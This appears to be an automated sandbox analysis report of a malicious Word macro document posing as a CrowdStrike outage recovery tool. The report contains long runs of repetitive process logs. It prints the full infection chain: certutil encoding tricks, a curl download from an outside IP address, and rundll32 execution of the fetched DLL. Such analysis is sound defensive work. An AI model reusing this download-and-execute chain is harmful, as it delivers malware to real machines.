File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Name: ThisDocument

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

PE file contains sections with non-standard names

Source: curl.exe.4.dr

Static PE information: section name: _RDATA

Drops PE files

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Local\Temp\curl.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr	Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: s Hyper-V settings.
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V Settings
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_000000013F4DAFA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		22_2_000000013F35AFA0

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA stomping: true

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

